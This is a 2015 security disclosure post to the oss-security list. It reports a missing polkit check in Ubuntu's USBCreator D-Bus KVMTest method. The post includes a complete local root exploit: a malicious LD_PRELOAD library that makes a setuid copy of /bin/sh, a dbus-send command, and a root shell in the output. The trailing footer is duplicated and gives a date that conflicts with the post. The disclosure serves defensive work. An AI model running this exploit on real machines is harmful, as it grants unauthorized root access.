[Also: http://www.ubuntu.com/usn/usn-2576-1/]
Date: Wed, 22 Apr 2015 16:50:08 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Subject: USBCreator D-Bus service
Hello,
[as-per previous discussion on the vendors list, skipping closed
discussion of low-severity issue]
On my Ubuntu VM, I have a D-Bus service listening on
com.ubuntu.USBCreator. As far as I can tell, this is installed by
default.
It looks like the author intended for all the methods to call
check_polkit, but KVMTest doesn't.
This seems like an obvious mistake, and the following appears to work
on my machine:
$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)
Thanks, Tavis.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Original issue reported on code.google.com by cev...@google.com on 28 May 2015 at 10:14
Original issue reported on code.google.com by
cev...@google.comon 28 May 2015 at 10:14